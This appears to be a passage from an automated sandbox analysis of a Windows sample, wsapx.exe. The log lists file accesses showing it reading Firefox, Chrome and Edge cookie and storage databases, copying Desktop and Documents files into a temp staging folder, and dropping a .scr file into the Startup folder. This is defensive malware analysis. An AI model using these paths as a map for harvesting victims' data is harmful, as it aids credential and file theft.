Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\BJZFPPWAPT.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\BNAGMGSPLO.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\BNAGMGSPLO.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\BNAGMGSPLO.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\BNAGMGSPLO.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\BNAGMGSPLO.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\BNAGMGSPLO.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\EOWRVPQCCS.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\GAOBCVIQIJ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\LSBIHQFDVT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\NVWZAPQSQL.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\NVWZAPQSQL.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\NVWZAPQSQL.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\NVWZAPQSQL.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\NVWZAPQSQL.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\NVWZAPQSQL.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\NVWZAPQSQL.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\NVWZAPQSQL.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\NVWZAPQSQL.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\NVWZAPQSQL.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\PIVFAGEAAV.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\PIVFAGEAAV.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\PIVFAGEAAV.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\PIVFAGEAAV.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\PWCCAWLGRE.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\PWCCAWLGRE.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\PWCCAWLGRE.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\QCFWYSKMHA.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\QCFWYSKMHA.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\QCFWYSKMHA.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\QNCYCDFIJJ.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\QNCYCDFIJJ.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\SQSJKEBWDT.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\SQSJKEBWDT.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\SQSJKEBWDT.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\ZQIXMVQGAH.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\ZQIXMVQGAH.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Documents\BJZFPPWAPT.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Documents\BJZFPPWAPT.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Documents\BJZFPPWAPT.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Documents\BNAGMGSPLO.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Documents\BNAGMGSPLO.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Documents\BNAGMGSPLO.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\System\System Info.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
